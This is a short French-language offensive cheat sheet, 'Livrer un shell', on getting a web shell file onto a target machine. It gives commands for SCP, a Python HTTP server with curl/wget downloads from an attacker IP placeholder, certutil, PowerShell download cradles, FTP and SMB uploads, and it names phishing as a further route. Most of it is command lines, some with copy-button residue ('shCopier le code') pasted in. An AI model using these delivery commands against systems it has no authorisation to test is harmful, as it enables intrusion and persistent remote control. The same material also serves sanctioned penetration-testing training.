# Livrer un shell ### 📚 SCP (Secure Copy Protocol) Utilisez SCP pour transférer un fichier depuis votre machine vers la cible. Assurez-vous d'avoir les droits d'accès appropriés sur la cible. ``` scp chemin/vers/your_shell.php utilisateur@cible_ip:/chemin/sur/la/cible ``` * `chemin/vers/your_shell.php` : Le chemin local vers votre fichier shell. * `utilisateur` : Votre nom d'utilisateur sur la cible. * `cible_ip` : L'adresse IP de la cible. * `/chemin/sur/la/cible` : Le chemin sur la cible où vous souhaitez uploader le shell. ### 📋 Serveur Web Si vous avez accès à un serveur Web sur la cible, vous pouvez également utiliser un serveur Web temporaire pour héberger votre shell et permettre à la cible de le télécharger. 1. Sur votre machine, démarrez un serveur Web temporaire (par exemple, avec Python) dans le répertoire où se trouve votre shell : ``` cd chemin/vers/repertoire python3 -m http.server 8080 ``` 2. Remplacez `chemin/vers/repertoire` par le chemin vers le répertoire contenant votre shell. 3. Le port 8080 est utilisé ici, mais vous pouvez utiliser un autre port si nécessaire. 4. Sur la cible, utilisez `curl` ou `wget` pour télécharger le shell depuis le serveur Web temporaire : ```bash curl http://votre_ip:8080/your_shell.php -o your_shell.php ``` ou ```bash wget http://votre_ip:8080/your_shell.php ``` * Remplacez `votre_ip` par l'adresse IP de votre machine. **🛠️ Utilisation de Certutil (Windows)** Certutil est un utilitaire en ligne de commande sur Windows qui peut être utilisé pour télécharger des fichiers. 1. **Sur votre machine, démarrez un serveur Web temporaire :** ```sh shCopier le codecd chemin/vers/repertoire python3 -m http.server 8080 ``` 2. **Sur la cible, utilisez `certutil` pour télécharger le shell :** ```sh shCopier le codecertutil -urlcache -split -f http://votre_ip:8080/your_shell.php your_shell.php ``` * Remplacez `votre_ip` par l'adresse IP de votre machine. ## **🚀 PowerShell** PowerShell peut également être utilisé pour télécharger des fichiers. 1. **Sur votre machine, démarrez un serveur Web temporaire :** ```sh shCopier le codecd chemin/vers/repertoire python3 -m http.server 8080 ``` 2. **Sur la cible, utilisez PowerShell pour télécharger le shell :** ```powershell powershellCopier le codeInvoke-WebRequest -Uri http://votre_ip:8080/your_shell.php -OutFile your_shell.php ``` ou ```powershell powershellCopier le code(New-Object System.Net.WebClient).DownloadFile('http://votre_ip:8080/your_shell.php', 'your_shell.php') ``` ## **🕵️ FTP** Si le service FTP est disponible sur la cible, vous pouvez transférer des fichiers en utilisant des commandes FTP. 1. **Sur la cible, démarrez une session FTP et connectez-vous au serveur :** ```powershell ftp votre_ip ``` 2. **Une fois connecté, utilisez les commandes FTP pour uploader le shell :** ```sh put chemin/vers/your_shell.php ``` * Remplacez `chemin/vers/your_shell.php` par le chemin local vers votre fichier shell. ## **🧰 SMB** Si le partage de fichiers SMB est disponible, vous pouvez utiliser `smbclient` pour transférer des fichiers. 1. **Sur votre machine, utilisez `smbclient` pour accéder au partage SMB de la cible :** ```sh smbclient //cible_ip/partage -U utilisateur ``` 2. **Une fois connecté, utilisez les commandes SMB pour uploader le shell :** ```sh put chemin/vers/your_shell.php ``` * Remplacez `chemin/vers/your_shell.php` par le chemin local vers votre fichier shell. *** Autres lmethodes : **phishing**, **formulaire** ou **page web**.